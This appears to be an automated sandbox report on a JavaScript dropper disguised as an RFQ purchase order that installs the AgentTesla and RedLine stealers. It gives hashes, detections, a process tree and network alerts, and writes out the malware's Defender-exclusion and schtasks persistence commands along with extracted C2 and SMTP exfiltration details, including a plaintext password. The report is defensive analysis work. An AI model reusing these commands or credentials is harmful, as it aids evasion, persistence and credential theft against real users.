Windows Analysis Report
RFQ -PO.20571-0001-QBMS-PRQ-0200140.js

Overview

General Information

Sample name: RFQ -PO.20571-0001-QBMS-PRQ-0200140.js
Analysis ID: 1519256
MD5: 5e1cdaa87915b9b6e7d852c0b7ce272b
SHA1: 978f40e995fe1fd0e10f73f8b7924dd31ffb6267
SHA256: 3335d593c4a2f7ab94a35fd5a0991026d1800592a18cc842686d3bf6bb66503d
Tags: js, RedLineStealer, user-abuse_ch

Detection

AgentTesla, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected RedLine Stealer
.NET source code contains very large strings
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Installs a global keyboard hook
JavaScript file contains suspicious strings
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 2772 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ -PO.20571-0001-QBMS-PRQ-0200140.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • x.exe (PID: 4476 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: E7114D96EC31D8CD1C0233BD949D1E0F)
      • svchost.exe (PID: 3500 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • x.exe (PID: 2888 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: E7114D96EC31D8CD1C0233BD949D1E0F)
        • svchost.exe (PID: 1304 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • x.exe (PID: 1612 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: E7114D96EC31D8CD1C0233BD949D1E0F)
          • svchost.exe (PID: 5288 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
          • x.exe (PID: 6496 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: E7114D96EC31D8CD1C0233BD949D1E0F)
            • svchost.exe (PID: 5040 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • x.exe (PID: 3848 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: E7114D96EC31D8CD1C0233BD949D1E0F)
              • svchost.exe (PID: 2736 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
              • x.exe (PID: 4644 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: E7114D96EC31D8CD1C0233BD949D1E0F)
                • svchost.exe (PID: 6792 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
                  • server_BTC.exe (PID: 6832 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
                    • powershell.exe (PID: 3700 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                      • conhost.exe (PID: 1364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • WmiPrvSE.exe (PID: 3668 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
                    • schtasks.exe (PID: 1012 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 03:26 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
                      • conhost.exe (PID: 2452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • TrojanAIbot.exe (PID: 2868 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
                    • cmd.exe (PID: 2884 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp6964.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                      • conhost.exe (PID: 5736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • timeout.exe (PID: 1824 cmdline: timeout 6 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
                  • neworigin.exe (PID: 5496 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)
                  • build.exe (PID: 7140 cmdline: "C:\Users\user\AppData\Local\Temp\build.exe" MD5: 3B6501FEEF6196F24163313A9F27DBFD)
  • TrojanAIbot.exe (PID: 1344 cmdline: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe MD5: 50D015016F20DA0905FD5B37D7834823)
  • TrojanAIbot.exe (PID: 4520 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}
{"C2 url": ["212.162.149.53:2049"], "Bot Id": "FOZ", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\build.exe | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
C:\Users\user\AppData\Local\Temp\neworigin.exe | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
C:\Users\user\AppData\Local\Temp\neworigin.exe | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
C:\Users\user\AppData\Local\Temp\neworigin.exe | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen |
  • 0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

Source | Rule | Description | Author | Strings
00000010.00000002.1731769518.0000000003189000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000012.00000000.1724575722.0000000000E62000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000012.00000000.1724575722.0000000000E62000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000010.00000002.1731769518.0000000003112000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000010.00000002.1731769518.0000000003112000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Source | Rule | Description | Author | Strings
16.2.svchost.exe.3189000.2.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
16.2.svchost.exe.3189000.2.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
19.0.build.exe.f40000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
16.2.svchost.exe.314b000.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
16.2.svchost.exe.314b000.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 6832, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3700, ProcessName: powershell.exe
Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ -PO.20571-0001-QBMS-PRQ-0200140.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ -PO.20571-0001-QBMS-PRQ-0200140.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ -PO.20571-0001-QBMS-PRQ-0200140.js", ProcessId: 2772, ProcessName: wscript.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 6832, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3700, ProcessName: powershell.exe
Source: File created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ProcessId: 6832, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 03:26 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 03:26 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 6832, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 03:26 /du 23:59 /sc daily /ri 1 /f, ProcessId: 1012, ProcessName: schtasks.exe
Source: Network Connection, Author: frack113, Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\neworigin.exe, Initiated: true, ProcessId: 5496, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 62828
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 03:26 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 03:26 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 6832, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 03:26 /du 23:59 /sc daily /ri 1 /f, ProcessId: 1012, ProcessName: schtasks.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\AppData\Local\Temp\x.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 4476, ParentProcessName: x.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ProcessId: 3500, ProcessName: svchost.exe
Source: Process started, Author: Michael Haag, Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ -PO.20571-0001-QBMS-PRQ-0200140.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ -PO.20571-0001-QBMS-PRQ-0200140.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ -PO.20571-0001-QBMS-PRQ-0200140.js", ProcessId: 2772, ProcessName: wscript.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 6832, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3700, ProcessName: powershell.exe
Source: Process started, Author: vburov, Data: Command: "C:\Users\user\AppData\Local\Temp\x.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 4476, ParentProcessName: x.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ProcessId: 3500, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-26T09:21:45.974042+0200 | 2043234 | 1 | A Network Trojan was detected | 212.162.149.53 | 2049 | 192.168.2.8 | 62827 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-26T09:21:45.819379+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
2024-09-26T09:21:51.238622+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
2024-09-26T09:21:51.604628+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
2024-09-26T09:21:51.828606+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
2024-09-26T09:21:52.108691+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
2024-09-26T09:21:53.186085+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
2024-09-26T09:21:53.875047+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
2024-09-26T09:21:54.077941+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
2024-09-26T09:21:54.211040+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
2024-09-26T09:21:54.356399+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
2024-09-26T09:21:55.060897+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
2024-09-26T09:21:55.238452+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
2024-09-26T09:21:56.197571+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
2024-09-26T09:21:56.202778+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
2024-09-26T09:21:57.257223+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
2024-09-26T09:21:57.395273+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
2024-09-26T09:21:57.625513+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
2024-09-26T09:21:57.654624+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
2024-09-26T09:22:00.347751+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
2024-09-26T09:22:00.518185+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
2024-09-26T09:22:00.686262+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
2024-09-26T09:22:01.476954+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
2024-09-26T09:22:01.648761+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
2024-09-26T09:22:01.809750+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
2024-09-26T09:22:02.168029+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
2024-09-26T09:22:02.584849+0200 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-26T09:21:51.913733+0200 | 2046056 | 1 | A Network Trojan was detected | 212.162.149.53 | 2049 | 192.168.2.8 | 62827 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-26T09:21:45.819379+0200 | 2046045 | 1 | A Network Trojan was detected | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP

                                AV Detection

Source: RFQ -PO.20571-0001-QBMS-PRQ-0200140.js, Avira: detected
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe, Avira: detection malicious, Label: HEUR/AGEN.1311721
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe, Avira: detection malicious, Label: HEUR/AGEN.1311721
Source: C:\Users\user\AppData\Local\Temp\x.exe, Avira: detection malicious, Label: HEUR/AGEN.1321671
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Local\Temp\build.exe, Avira: detection malicious, Label: TR/AD.RedLineSteal.dzdht
Source: 16.2.svchost.exe.3189000.2.raw.unpack, Malware Configuration Extractor: RedLine {"C2 url": ["212.162.149.53:2049"], "Bot Id": "FOZ", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
Source: 16.2.svchost.exe.314b000.1.raw.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}
Source: C:\Users\user\AppData\Local\Temp\build.exe, ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe, ReversingLabs: Detection: 83%
Source: RFQ -PO.20571-0001-QBMS-PRQ-0200140.js, ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\x.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\build.exe, Joe Sandbox ML: detected
Source: unknown, HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.8:62826 version: TLS 1.2
                                Source: Binary string: wntdll.pdbUGP source: x.exe, 00000002.00000003.1530923482.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.1530355162.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1565181805.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1565707457.0000000005050000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.1600560631.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.1600415328.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000009.00000003.1640373275.0000000004030000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000009.00000003.1640053185.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 0000000D.00000003.1680596257.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, x.exe, 0000000D.00000003.1679446140.00000000039A0000.00000004.00001000.00020000.00000000.sdmp
